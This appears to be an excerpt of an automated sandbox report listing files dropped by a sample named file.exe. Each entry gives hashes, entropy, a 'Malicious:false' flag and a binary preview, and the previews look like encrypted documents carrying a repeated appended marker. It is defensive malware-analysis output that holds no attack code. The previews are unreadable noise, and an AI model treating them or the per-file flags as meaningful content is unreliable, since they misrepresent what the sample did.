          Preview:1.2F9_#.M....bu5p.h.....yj.$...-ve.................&.N>....@^W........c.[....1.[.*...0.W^P....(.I...c~.X. ..0..i.<h.:.A^......Uu~...B..X..!..<7.._&.n.D...$r@11H-...R.A...-......;".'O.^..$-..m.@)..k....[I....o`J([..../...Y..[X's.S$.Az...u.A..V.a3i...M..MuM....n.rM...%.Z<...~4;6.f......(....`.I......9.-..J.zHg.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):450
          Entropy (8bit):7.493168463837632
          Encrypted:false
          SSDEEP:12:h+oWd6cnB8WOR9ZRv/KqoG4NSCLcJEWaSzv4A+KixpZacii9a:h+o0nf4/B4M33rb4A+KiTkbD
          MD5:9722C52243E86EA7E000379F01A68354
          SHA1:38E5A3CE65974E51BAE4161C7E0F36EB351FC590
          SHA-256:D678E328DBFAE6DC355DE2EF07B26B1C49936E190D5ABCE7C7153404E01D666D
          SHA-512:7B176FDE32B4109D425444B93501ABA50DEDB35BBFE748BF1AE89FFF0E287EF28709B9EB3D625529A81113809EBBC6208D849B2639077A819B368ED5DB08FE32
          Malicious:false
          Preview:{. "...\.f;b.(...J(.2..g....eR.../.%..*,..,+..#...i.(G.p{|A..V0.#.`._.V.a...a*.....,..P<l.%......U.n.x...U.I....X..>)....N..V.`P.<..{.F#.......FQg....en......8.LP.;g`.{8..5.......N.F.....L{. yQ7.1\..>v...P...3..U...s.6s4...m>.4'q.{H.}.h.c....Ri..Oy9.I=.SE.6.....8.8.a\.!1..............5..M.\...tC..jN..]...+.V..D.....}...qP.>.8!...,q./.N..F.l......@...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2196
          Entropy (8bit):7.907925853292114
          Encrypted:false
          SSDEEP:48:2/+yfVVm+XfGP5jXkSgAZ7bM8PRmL/RdOONKRHdiGaygB9rgAobz9tEMJG0/Xquq:2JJGhjoAZ7fWfG94ygB9GVGMJG00
          MD5:7A33E4B80A7EBAF06CF14B7CF79610F0
          SHA1:51DC2C78D7187C435A130A80FE86C6BBD3290351
          SHA-256:0148E645EF3EEA378C12E62BF229118357080EC4609D85609C060D47A52E7E5B
          SHA-512:DF6EA3FD71E48C94D051A2BE118CAAFEF8F0E1F1E45BA1E64E7C7C19E198D2CCABEACE08D7C629AF5422E7B541B0764EDD9FCAF85B03BF721E20F5EFA92D9965
          Malicious:false
          Preview:[{"de..<r..d-......rH}..=T.<...=Zz...E.7.......2..O..^...,.....F.v..%.s...&'...py.1|I..^.Sp=..k0.[.1M<...FV.Z.u....!..U.~..T......AUv.W.. ...6<....0..-.Z..u;k\fb.8.2Jt%.J0..`........0.hb.8S..F..x.rB.@..M7T.*..m.....*.7.-X.T.M.....,t..........F.q3....Qz..S.I.8o2...........W>._g.[..~|...P...P......".......{"..S........?....j>....;.6}...)|..L..7......A.$..g..9U......Zm...uwr.~.r...]...{.....!.f..W.........3Bt...gr....g.c`./|}]..+|....}.NI.`..1.K.ZMiH...f....2...<oH`....I.dJ.y..(MB..W..+....?E......k.3.......4.8.....x.Q...P...[....W..b.....b.....o...`D.i6.....J.0_K...k.N..+...0........h7.... .os.4.<.......0...x..w..n.EM..f...+..?.....u....ojTn.N......su...qDZ.b/eD.3eB,l.X.;..Q=.L..S...S...d..m.*Ge....[.%.^.........-..rNyj....C. 72.)....O."5H.....z^..-EC......+8t.%..?P.Ef_N1g........s..1.S.Mh..*@C2...'.`.......J...V.I/....x..kt...:*y.-....h....K.T.B......Rv....$."..|..{q.....%Y+..-..r...K...G...yfj..;~D.2....G...a.O..4.[...j....+...i..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):6034
          Entropy (8bit):7.969998874393823
          Encrypted:false
          SSDEEP:96:Bfsz7tI3NfG5Mx+CczwaqSbUNo4WW3Bg2PvHurSCGDO0BqEJWn4WKsUI4sfrHQSc:RWGJGix+Cc8BNNFnPvHDpBqEyKsVPfMt
          MD5:E874B90E91BF10136ACDFC5BF7B873C3
          SHA1:9E50018902E65D3CD4E017A926C22196F8433FAA
          SHA-256:92D3F2E7A50A4AD0670FF0B8018ABD456B7CC7C424A2188E995FF22439246EF1
          SHA-512:E31CFA9A1C40B139F1A31F2878CCA0103B010CE2B078F68E892B97440FCD094214E5DCF24DA2E4CDDE24C488FAAB84D828432F7851D60AAC1D850611A55EF41D
          Malicious:false
          Preview:[{"de.p\..P..V..L..4.l.;..o.9..).7.lk.....u..n../....~...S.vu..B.jQ.?p.....'.Z....P..w3OX..T..u..T@.|.X...o..W...R.R...v.u,.h.....VIn........*zvD.`.g..o.I..T.$b.5....R.b..?.}(.I..>.4.x...nN]..^8j..:....+.....Nz3..,....U.X..mt.[YA..U?..a..gO....3].e.r...]...+.yJ.+B.q.O.Pr....Y..T.=..#y...7<.2E.*.&..J...z.,.u.G=.l...Z+...E.=...m....@..w..=..6}{.<..63]#y.......7p...-.....4<...W..R_..|q..........7..6.8Y.Q.`...j244..[..xeX.X..{......x..9...I)XX....b.......B......r....8.hs..N..%..:L.$...G.E'..].../&.|.g...$.X...[\....jk..&.~.c.3.WY.`i......z.]... ...C..&..Qm;..S..C.H2..6Oo...R.(..3.E>....h..1Y........X.m...t.zG;S.......a.z.v..E......p...q.....V....c.2..yn.>..V.5b..aQ+.......j............I01g..DT=...&:.....EZ.....9.3...%.'.w..ZQl..r...5.'...F.....w.P.n.Y.!.....e6....n.#3..^%.......m....3.._.]...gV.........J...9..r...l,...@.?q/.s._m.r..|DF.*N_.@Z=..|.N...OdB...%..5(.!........l...o.&1=.<..s.vd..:.7G}......W..p...W......*.....P..Z.J..n.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2203
          Entropy (8bit):7.90584602149724
          Encrypted:false
          SSDEEP:48:JerRS4KtUTJE0qEBn8YfgjE5hHgLQtgvdWUIzjS6E6J9m5iVqf+B/HAjlGiD:J+030Z8YIEvALpvvWjS6Eim7Xjl5
          MD5:749C82B3C9C5A6E6B2285B9BF9E9C26B
          SHA1:B6BD4B66A656F848DE17BACAB5A64D939E7EEC21
          SHA-256:59F7F06CF6240942936FB8B8CD98C1BC533FD4EFE835A65EB10AB0F0F4B68B79
          SHA-512:0C636C9FFF617B148A885E6B70DC9948EE16E7CF1EE231232B508EBDBDA2BD4ED166E025B7F44BDE76084C3220DBC32F1FE42FA295F9BE985F4FEEB306BFA4E2
          Malicious:false
          Preview:<?xml.y.*..zd...t..Y^9..C.:IC{DI.%...#....Q..y.....W...[N.s.'..#...wt.J.....P...k.5U...V..U0>...{.R7$....J..+..}vP..~..kN.s.[....l..w..r%zu.glP..s.D..._.O.R...K:.&...P..e.X......t....CUP&.($,.A.3..e.7..q.w.....~y....."I[......>.lqk.c~..I.q..-.g........4...}M....E..t?obb..[...Mn<...&g,N[Vw.Ur.....v.R.I.N'l.f.....#....8.#.%>..W...R..z_.u}]4=........=..,tA*..n.k\...9...j..k...~`....>.`\..9.b.U....3ZOefU...J...s....@......1.....HW.E...=H>l<.-...[-`.IY.[.9....R.{.F.l.....Sq~C^...E.....U.[.re.....j...C..;.rE........%0k?S.......[.....V.y.B..n.\.,.k~..|...-z+...cH`|s'p....~..1.u.L....X?..(.(S..~.C......9.o.../6Ar.7z..`.F.#........U...u../..-.7..|._.%.........nj...&m.....d..w...y.f7.fp........EH._.d...1......}@.o........x.po*T/...b.Y.9...1B9....&...!..UdM.$...S3S....8'...4^v5..E.&...p...K..h../....K. pCX...os.v/.p.I...x...X.X.K.....q..(...3........\.o.d...l..S.>.........%....-j...../.d.$U..|....!.).T...R.3y.....l..........$ C...K...c.o..n....C..yV...q+(.0.|
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.972722801002793
          Encrypted:false
          SSDEEP:192:VWpNHR6zlPaFymGIk3Vcw+mMKYGEg/A9/nX5H/jCD5igbjHyld+8:ApNHpyRZVf+Nbg/A5pfjCDzbTyD+8
          MD5:C4BB87B76069D6FDB6B9CDD17FEFF1D3
          SHA1:26934E93FA382B61D103CDDDE13FEFC23B5352CF
          SHA-256:A26F951ADF3470305644223091FDB6841045A37647EF20C287789C4A62D919B6
          SHA-512:17FE47567A2FDD06302A1819D90DB0F90122837465F99328AA81B4DA083FC74BF353A743C139181997E68246564B256629CF5421DF9BFDC6D79434A103BADF1E
          Malicious:false
          Preview:h..F.".).hK....tz...@...R...b.}L.`k.].....`..."f..Y...3..t.r.V.9@'.............7..`.x.......AB..P.m..].l4..@..+.....p=.c.m.7b..J..1Q..._../.:?.5..L*.[......SE.9....S.NPB.7..*..sn.@.....=.L0#b..4#8}......O..)..:.8..CP.,y.h|..jQ.`..|h.Ej..>...Y.^.,.?...|..2-..S..@....`._'.]..............WT.E~..@.Z...t....(H..Y+.>>.K..C.(...lf.S...F.f....#...w+L...4k..M7.....q.U<.+..<...O..Tt.p.'*.kS.*)..k..m.N9.....G%..]....k...JB..b...D..Ru....I.b.x..1o(.].F0......F..f.&....`......x...JS.......[.'..R..9......q..H.~......R.CQA.EI...-Om..x..Sj..-....~s...........naN....]@...o.PAF..&..H..Z#.~.!.!.......J&...q..........D@...q..f....{...8......z..b..`..#..y.....d..:..hR..EfC..M!.l..L:r..'x.....1...l...T.6.=X.aCz-\...+}...!~.r.O.PG...{.a.R..C.....E.0..&.K:I.I..e]...g..7uw....0.J...Rk.'Q.....J...4......nE..7...\+...2.Wa.......W....9..U ..P......ZQ..4....s......i.2{b...8..*.1n.J.a'L..\H=@+....U.j./2..).#:',2..t...fZ.u.ul@..5 ...k......E7...6J@.(...~.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.9627380732156303
          Encrypted:false
          SSDEEP:3072:nT4aMUgw1TOk/3MdCADUMoRhW0rQplQYPSy28ETMBrPVvYRrDV17i+w+p0R/q:caxg6ioPADsdrGMJSTG
          MD5:40557C32F83F1209B7E41B5A69993509
          SHA1:56AA9307FF40AC762360B4371A425AF9A1B32EB4
          SHA-256:6AC786E5427E98BDC75D1B9E57E9D0E1C74C9AB9C03C2D1712270F91BB1C4362
          SHA-512:6848CC1D641E0A50BD74E2874F7F669CBB8B650ACDB4D9435C79E23B555782AE83CD96A1360DA19ABAB48FD6907D966A670CE1709EE213891C8CE916999B21DB
          Malicious:false
          Preview:.._...../.......$....[.7.Q.y...L.ojy..SWW....k.<j:./i..qy.....GTDM.P..-..hPA.,.";4....8?........,$Fa....]...x.+..2.Mpu.p...U..qe....G.7i/J..O.......W..[..#..<..@i.3.b.B. ......U@,.J.uF.*..|ra...........#O..FV..#]X..sH..%H..M.:.j<...=.;^.?.K3..-.)..3D.".m.3..~...us..(.T....7MOp.h,@........F.*'..r.L..w.9.|....`.'....).~.l..`]Z....d....!9...Jm7.*.V-k.H...+..w0X..O.GJK....b......H..q9..-.fz...D.c..4.......O.g.....#.(....0...C..gnDe?....3.Q....!.t.#...Vk4..!...Z..r...Bw4._/..H..\.oi.0.VM.*..$..z.E.0.f.Y.j.....i.W<..!..Z.........m/.=.2....8........j...M!z..>.5....7.g.`.L]dQ.f.J ....T_...;.....$.qm7C .ZcX+L~..pk....^.......e|R...;..i.1.Mmu.X..-y......m[..<J.[D;.O.s..=m..q.!R....rG..E. %.g..].5.T..`..R..>.-.#.x./.j.....zq.k..2Y...q.............d...7.:.....>.u2.S..R.L/@tP._N#..I.,....s.?..._.>R.J`;.^.T.7..2...C9_d....Y.(..hN)...l5...."....u)_k.\m.M..-..k.P.A3.kp..2:#..i......v.`...z.,.../....8Q...O...'.e...}#..zT.<.I.h......\.L.IVh$R....La..4....1J.z@....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.2079671612039946
          Encrypted:false
          SSDEEP:3072:EfIW/91S2oL/duRZ7qp/koac4U5IGdGzBLwb+FiXk7D3MBAETsEB9kGP2XS:Ev/91Shyqp/F75IGYEb+FYOUTsE9kiWS
          MD5:593C566B0B17DC5984DD5B3B262EBC70
          SHA1:E17C348B2D2C7B6B8AB6CB1AFE99B051EA76D86B
          SHA-256:7EA161CEE1568EECD135598B0A0CE49741086FA45918DBCDABBD2B73CDC2D7C1
          SHA-512:6D2A1B62E8012DFEEE43E44264C3377CE51064BC2635761B8EF99EAADD09B20DF9DFDF319A87778DD485AD210409FD9A08A078331A39460F31610D15ECEF756E
          Malicious:false
          Preview:.....C\-....oF.....R2../. .h_O..>..f.Q..?..........}.u.W-a.......!.6.k........x.{-X.hE...hvh....%...Jx......=6....=.7..V .[.6.dxw..@.==.L.fj..(._c....o...1..N\.,....)....|S..[V.^l[...g.<..bf{N.....@..(#..R..$.....G.kS....hH^.'TU..|.cQ......R'#....t.=.rL5.e..c......=..j.i...!...-...Lb.9b..w..bs.....=..).........>...%...p.<.......#..B...,....;..7.bGrvsz....{._:..e^./8~hO.....<;V..`[,Hf.9~....m....BB....D.W..a.#^.U4.z...;.c8....K......\.~..w#zV...B.EE...Ia(.+..y..5......!}t.:.....l.......[..N..Y....v..2t......<...a]+...]..E.kg...a..w]...V.J....TE..g.{...t.L..e.O..#..5..e...r0..FM)..u.0.hl.../I.j.-..,(...y.Ow...$...C....4r.Ue|..O..u..H.$............L.j.9......;?>'.7h...].chh..2.9a..p..y"*....T........?}^...(...&....a...,#......,H...F.<.G......,.B..#......W^_.M.a.a....e%..4L...{.um-B..%D.|...p..d.._...MBn...I..X.`a...-.,........`9X;.n..l^.Z~^.....Hd...........'v.}..5.+... *.....5........*zu..f.}u<..-..C?2....@.;.^.D..}UW..>5<.rW...!.....F.rI.g
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.2074253956478898
          Encrypted:false
          SSDEEP:3072:ktkrMR9fFPqj9WwyCG2ToVNQykO7Dge2894Xqpsp5fxPIwu6yxc2Q:jOfFiWJRQykODOiXpsnZtu6ya
          MD5:F1DD2E05256B8E3EF0CA187C055AAC51
          SHA1:8C6F5FAB7F671697EC64768B799FE4C1E13F5655
          SHA-256:B1C9B8D643C0EDFD8062910AEF5A518636CA9DB81ECCF82FDBCBB3B8DED74B04
          SHA-512:4519E55C7C8505FE96C3F3CF8C46E8F38AB464731CB3F957EA342C81C28E8A87A6D61082A0E7C0BB6CF39CFE90D6575D4E80E26031F80059F4418D116A7E8548
          Malicious:false
          Preview:.......1#7.*....e.p.d..=A9.....F.M..=.&.M..7Vy.a...J.<.I.C]E..p.../...)....5...P..\..!.~?.@.)&..B.......bP..N.B.j....p......3....Y.S.D...-n..(.6.vh."d.K/g...Ser...Tb........S...'.z...s\.....R..&.Y..!.."\|...Ath..,.q.r..Q......+.z....z^&I~....-...-.....H.3+r.<bX...<..'.[.5-I...H...../z.._ _.f.:.G.|@..p.7.;..?....AZ...R+......v....._.@y.!..f....o..s...q.$...{2......&.f.uu.5......@.b.....q......!.E.WR...L2`...2../..4`7.........n..*...u9.I....\...K....K'x.Y.J.....B.~~~q.HR-0..B..[..W..|...Z[....(.6..vl^Y.....".~N..:*A...L..v........Q.(....r.='.-.b".;t.b-...E=.v.5...".A...O..(!.{.....FJH#.<$h.....o.....gu.^..!..\j.l.'.R....}.. ...-.(>...M.l"d...1....l.c7..P..<.....!...Q...=...C.]..Q.+,..%vu...q..0..H..gVU.A...:.gF.J]...3.@....H'.H.[..........i..g..x..Z`....n..7&.-....hd.Q~.b.j...%V..+..{q.F..?.B.3@.....C.@./sW....)...~.l6hN.....P.v.{.`N...4.p.zxa".g..Og..dU....Y.w..G*)7B..'..Q.R(....;.2.|..T.K........;........c.R., ...v.#.t..f...C............X.CE.3..y
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.2078489464820232
          Encrypted:false
          SSDEEP:3072:UXFFRxfWtEZsheZfknnIaVu1eiBBj+8wna/5E1GTkzyUMslzQHAEFVI/:U1bxfJie1wIa8xx/5Eik1MsWAiq/
          MD5:352E1D0797F482892D353480D469726A
          SHA1:A85D0714997F92D98888137E6973464A8CC4EB07
          SHA-256:D0BEB70657EBFF19D0AD716F5FD9498A2BADF830589A0C6011043F4C6F296160
          SHA-512:9525F8A2655E74BB971ABED06AD38031D730668DCE4D52DF6254036F240C4819952C782AAB97284092F10F3DE0CF91952E6B6220C6EEFE2703A07F574BC5B71E
          Malicious:false
          Preview:.....G.J.zL.I<.K|.G.C!fg.%..VI..R.{X.....R..8....f..[.9... 7......xV....o..'6o[(9...3....k...l......G.3.j+%..8.....m......6.|.}W.`..3.n[.x3.9T..=...$.cZ.9.8..X}@D[.omO.~`2}.../.KT:.%@.2f.9........b.Mn._.'c.&...C|k..pa....y.qi..DD.y.Z>-P.../...$.FZ.e.#...iW...G...(/a6P.J.`...d..m.".}..^......>}.....:[.l.o......c.'*=...Rq{.-......@\&.p(}3....i...%]jW.#,.../@.._..7e.O..../..D.B...OJ....t.b......d.wz.6..x..7|..h.Q........>.|(-I....Ji.;5..h...;$..I...............t/#.$.....Ym.J.....*-...0.G].#vm....O.o(.qN........%p.W.0..}z..<........>`..v...A-.3....w;...xh.P.[..:w.{.q:....A.."ti..y8_....r[T...``B.u.....;../kv.jx.~g...x..a...T./".&....V.y......_\/X..r..A...*?eyL...oJ.XQ...;[.{V.....`...0_...=P.\.).Nx.1.a<!amZ.O.P?..:a......r..0.2.=........B.r.[h.]q-.Gx.......&.}..|..3...:..lA....0...L.HmY..`.p....lw.~[Q.P].(....e<..x.9o.z........z..m....{..d.`.j~~.m......~.1EaOI4TS.0..r..fY...H..\..`../K..X.Wtq.m...........gV.'.].Z_..2..qW.."-_......K.....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3384
          Entropy (8bit):7.944929879077798
          Encrypted:false
          SSDEEP:96:OogIi+gOtsavtxLzx/P6RVs5aERZP+y9pYyJoKZ:XgIWisM9t6KaiZPN92yJo6
          MD5:856BF411E197A6C65DB707247DC63090
          SHA1:45297820578A65342524540B8C16B54932D5DEA9
          SHA-256:71F5BE86017349A7A7DC02E7F08041FF98EB16DDEE26C0513D2CFD180A1994EB
          SHA-512:21680EF4A98A791BE1A0D032AF259B3F3A70EF0B748A9ECE800AA610B17E4BB8D63513B44E08D2F9643F2AB6AF88C9A4B37431780A1D953A392E60283ACA0F3F
          Malicious:false
          Preview:<?xml..;..C.5.l.....It#.1P..>..b........;.....HD..U......A.j^.]...L...]...-[....g.8L/.+.Y....=n....I.h....wh.........d@...'...u..$..&Z.'!g.+2t....w;m.x'....m.......2.......6.ui..........X..\...,....0,.`...v.DRy..[*..C..U:2..!..q..E..^[;^)~.D...~\...f.E.].>.eO. >..y.B..{'6.......m...0..|...w.k..z.>...79.%..E..9.;X.)..{.:..&......*u..s..ah..RL.....q.....$:.C.#0o..8,...2..c.+26W.I..I.V.P..\.3Y.w....s...Xob..S..K#..IC.-..9......`.:.<........^.Mc...B..q=.6_....<p.Nb..*...W..u].X.F...m7......s..COd)B.-Kc#..y..6.S...A.f....EP........0+.x_..95...I!.Z&GR,(..L...s-..T..Q{.....$k.jq:s....<...?.p...V1...%u..f@.I.z1.Az..........c.9i.>?0..DP.X=.V.;.SV{UBG.v.[..SVD.M..T.D...P.Gy.e8^S..X...V}...(..k...]....f[....w...\7.W...~J)|...p\T...T.... ...{Ex.a.....?7}..Mq.E.q.~...Kb.&...U8RcE(..\....F...>...&....mU....>.Z..~.b.c@.}........../9...}>...SMV....?...<4.~..q....r...w{.2Ju...v.&..c.z.sr.2.-....1..m...b.~(cX<.0.o..g>KgR..'....m....s04j...*...R....qe.I....:..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):724
          Entropy (8bit):7.718519958250182
          Encrypted:false
          SSDEEP:12:Wp3mUrH/pEdy2Gg3yGNs1mlHuFkDrG/MIrZSAe0DZ1jVUIixpZacii9a:WFHrf5YlHUUG/Mwe0V1jVUIiTkbD
          MD5:A809E1B38C82DAC2485F5E3BFE997E5A
          SHA1:C899803EDBE4950DBA6610D1ADB02F62C63C7556
          SHA-256:48333DD067DF40C6BD4810772AA587CFAD4490F087DC04C5440683E5703FC1B2
          SHA-512:946FC9795034F1E2BDF2698C11F495502429366DB7FD7A363CED62DE6CA2798697EBF7249965F1FD95D126F7AD50BE58A4B70D15BE160AC675A36E810DACEFBB
          Malicious:false
          Preview:{ "Me7..)o.6 ....)...O.I.......)!n.....).ZN>..MS.:U[..7.....@..............m.V<"...ET..G..._...}.Y..6[8.Z...D(..........^Z.!.._p`p...P......j...d...O.k.>.w....5n.......r:./&..(.8..m'#D.fb3..._gSm.j....6...@....\.H.fH..".qt...\.....A.0...g.x..L..2!......-...Z......>...dV..S..R..,r........).T<^.......j.... .h...`........u..2.q.$..IU.o3N.}.H...P"Q+....I....3...x<..:q.l..e....y.......S@..F.A..A.{&..z....J.N....7...-Y..B.#...b...4oV..l....wY.w...(...2Wj.!.W.A=4t^.c..s....M....C...p<......i..,.....u(62..=q@"..\n.9........N.r8......)..|..... ..F...K.p..K.:.+... 'n.W?....1U?A..v../T.d*.....\uxn.2r*)..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1062891
          Entropy (8bit):5.529763241142686
          Encrypted:false
          SSDEEP:12288:xK2/ThWHiYdPXSZlV0N8x5thr291gess3TylunXR:xCfv
          MD5:BD9F3C9548231358D8C08749568F3156
          SHA1:E0E36F6BC1355FB56CCCEE1455329D2660D026CE
          SHA-256:B9247C30967FC5EC19311DE239998B481A03368792C047D75A2708A9593F3E6E
          SHA-512:400A64FCE992E756308FDDC168075D769714A4FCC722118886AC9A666B7357F662FEE4FF7E49D9D92908ADE5960597DBE3303B922B2DF38FECA20FE2958D94C0
          Malicious:false
          Preview:<Rule.t..(.e.t9..}....&}.&.....U.X.........]D=.r....8..........dg`./d..}...!.....0a6..v..c.c.B...4k.F"*.@..{..].|..j(./.3.)?.g.l,)...\...#z...P.V.._.........4G...g..n.=L/c..r.f.2g.d.~.~w.RA..44..[.5%y.^.....s...5jV.T...*.w...#..l'.+.........8.Bj..Z..A......k..t...J.}....n.OW....0...?>u.5%.wL.l...."..j....#.E...K..L.0/...:.x...X.@.......&.p..c..gh...Z7...2.Ki.f..M.U.........b....10.z..;fR.9......cRc...=.#Td...@.._$.qM..P5!R.|.....W3.e.W..:f..LK..=..s*^.-..t.I.._.xV..b..".~v. .mFS.."...>.<......&.,..tkU.L..*.|......"...Y....C.4.e;..O&,.P..6........Z..K(.+ ..dzz'..n..PXQ..".n...]O.Lr#.k. .b.....@.....P..3..%s..M..q...1C..SCCD.q..c./4.p...:.....a..%.C.i.|...6...V.`!...eP.m.U+...J.H......!Ka.]2~.-..\..k....,L.f2F..M.-L...w..5..h.TQ6.8. .......].`..D.......@y3.".v...[..g.g.....B.KT.b`..7n....syZ..{c.-.K......H.OG..a4Xb...............#f..%..yf..l.n..-...cfWoo.g.2..F:.].f...c.3...?..M.V.T..u....XL.W[.s..i......Z...]...g{dZ6HW8.D..J...f\ik-....ig
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1583
          Entropy (8bit):7.873743182608207
          Encrypted:false
          SSDEEP:48:W3g+vbCQ9qXULQ+mH9cGekKghGK8UXU82yFKSiD:WoQeUVmCFkKgn8UXU82yQ
          MD5:63BF5FB3499759C328CFEE8DF4841F78
          SHA1:5C8E3AD756657682864DCB57A94097389CED5723
          SHA-256:CD10569DCB3D3CDF3D3917667E32A4AEA5C708F7086D680504B5E0E7F290AC50
          SHA-512:D23FF445745070880C8477CE377543711BB2547AC88DE8321FD2E11D4FF0CB365D20D2CC40783B19B1A66CB6838191DEEA7222737246F2966E5F1EE713113607
          Malicious:false
          Preview:<?xml.a...+....Y...#.....G.7.cm....L.....U.D...........v...O...x5RfE.r....Jt..*........n.v.<.X.g.M9.#....{.j}Bf...:.NZ..../@>Bl..v.U.9.w.\..8.#+|".!....XN..P...0..ty..c....tK$>......w5K.B.K>..E...w..1...d..?...9..o....(..s.v&.n....a#....^.._YA&0c....A..T_....[.o.A.u...#..s._..;._....-..^...{.AJ.....as.M.\...r..k...+....^.F..p).5..uAXN.R@...F....y...}.V..rC.8C.).....(?..Xe...t...=...$..b...o.1m...p....&WD...i.E.J....J. .Q=#...8..E..._........A.L.....7.....<R.<....,1...E..AZ.4..5\..@....z..{.W...^>H...A.....z.w..Y....'w.4..q.;..t.Q......I...@c..G7....=e.7.S.RQV?F......t"N.1...5...$..:.v...!.M.R....d3N&O..N...y..e}LldR.....1=...$..X<.e.1B...RB...Mtm.U...p....D.9..sr.f.@.!.w..7V:u.2...'.F.3..9..(...<....w....m.+....PDN.G....e...\...S.}.]d}..\...`....oE.N=.Lp..:YP.D.S.=e:..>H.....q.Gx.....-.D)..3..M.l..n..3T;<.....?....3h[..!.t....{.I..M[.a...V.......E..w..._$..\vP.+.....H.@l;...b..4.@.KhM".....H. ...9..</...1.]>......KW ......3..B'.@....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2801
          Entropy (8bit):7.933508019596942
          Encrypted:false
          SSDEEP:48:EKBj1OL98k66P1sB+5lX07amrJlt4yu2R3CFMB7mcoG1ZGwuCNwINZneiD:EKBjSse1sB+5lE7r+r2R3CMoeYkNHnh
          MD5:ABB5C806EBEE77AD4778A8913BF931FC
          SHA1:A11EBFCAB07DD849C6AAEB6FE3F0269EC4F0FBE3
          SHA-256:8C6496569979241ABF6CCB7A3DD936F60426D2C7A4B7B1CE955208169FACC625
          SHA-512:D946CCC8B53DE5517D4E2FC1ADEE3BCD3FD0F3641BEF7333DA766832BF2428884C2C4FF27CB336A9137B563F2374377106AC2CCB355EC45AB49A961195A8CABF
          Malicious:false
          Preview:<?xmlv..< 7%H.,...vPC~.........nW...A.}...gw.^L..,...7..$.@_.I8&V}.h...Z.R..&.zy....1.....@...,.H..B..<..0.!....Z.n:fl8yO........)..sd.....s..).vZ%j.dE........f.4..5..sQd...J....bUD'...d.V....C.o%3......b......@..~..Ok._.B.$...b..R..D.K.8.._.,D]..PQ..k.b....6L.Bt.[$K./.[.+a...Mx.e..i.w..hE..5.9&.v....A.....8._.....|}c....L..=b.,D....Yd...>^r...F..a..[............KUa.gs....V.`..g.v...s~g...Lez@.....=p^jU`...,T.yr.(...]..^.rK.X-..<q....=.SF..B.|3HP.#.I....1."..l@.._9.... 3..r.>z....B.....4.5...............$...h.W)........g@d...["K.O..}...6..A......ME]B..I&.....N...q..Qyut},%A...an.,....C..A..r\z.-`..`.......l....jQ.9.f....DS......O.. $.6>f.b...}aqv.7u\..'(............(.....K.C..N...U....fP...:..~K..3E...e..;<?...w...O..{...BR.....u.....,....6.n..l...s...G.....t....k'X.......G.:..j....:..l.OfI...bUk+...........Hf{.....zs......P........@...u.:..U5W.]T..18....2...JPl.k".t.(x."...t....r.h..]..`-.;.S....9E....T..%B.$.=.W..y.p...=
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):4121
          Entropy (8bit):7.944205770606924
          Encrypted:false
          SSDEEP:96:dkvS91wNrJo/U1Z3sbN4HqyiZhC7UfrGzeHC0k0Bo39:t9Ip3vAZhCoZCt/t
          MD5:4F7BE59A8F035FE5F6667D92319EADDD
          SHA1:14D5EEBD9626EE9B096CA5D6C9B0AA9F0542AC63
          SHA-256:36EB81B8F24FAC8041B3BB8C66047C97BEDAE1F997AB3DCE397B3943D0F3B31A
          SHA-512:AD14F785FC759448FD81AF369FA20A3C18502489DDCA71E0B4C5E001AEC643D82336C49223FDBB6391A53E828A4EC173F0465B9BCD836E5BA626041EBFEDD073
          Malicious:false
          Preview:<?xml......~_..3K...A=......d9..&.0....<....\.9..b...m.........X..46....n.G...,..N.Vu+[n.K;..4wN..IX.C.....!.r...R1..V.9+j).\&.&E~....'0%g...0...B..-....L>[vk...-<.3W.E.;z...m...]0.nv..b..<......`..._{...<."..............b7P.N4..z~.G..f......O~~.L.G.B...4...4..W....lRe&...+Kq3..RO.R.......jeH6...6b5G?..W...w....j.dz..I..v....O..{=m.]..-q.Wb..a.b. .........."...K.0..cK..\|....Q. .o..O...=\...z.x.>...H..Q. .......2.`..U.._._.C...#....L.B..3)K.@.lo.......U.l...._.......%..!.-.../.f._...0.c.T..zA..4..?v.zv...Z7!C..Q}...r"..A..?XD.ZM....C...6..WuE3A..)7.....K.# r...{b..+.p......vf.....3'....N........-.f..$......E.....S.q.Cp....|w.[..m.g[]..d.*S......XyJ.U8m1.Ub......]e.....T.A,.X..I.y.'...e..eg..5O5..n..2.R+U......YAp.M9.....^M..(S>..N.P.Q=.W|A......z.o..<..!./......XSw.Sf......I:V..dH~.\.e....../...v...b.?.......).../|..0f...R.(..Wqa.v....0..?N.b._VT..p...u.e...%7....nz...8.2.:.....-./.......'.!qu..]i.,.../.$...r..t.mt.:.@..p.pw.'
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):8140
          Entropy (8bit):7.977360233102436
          Encrypted:false
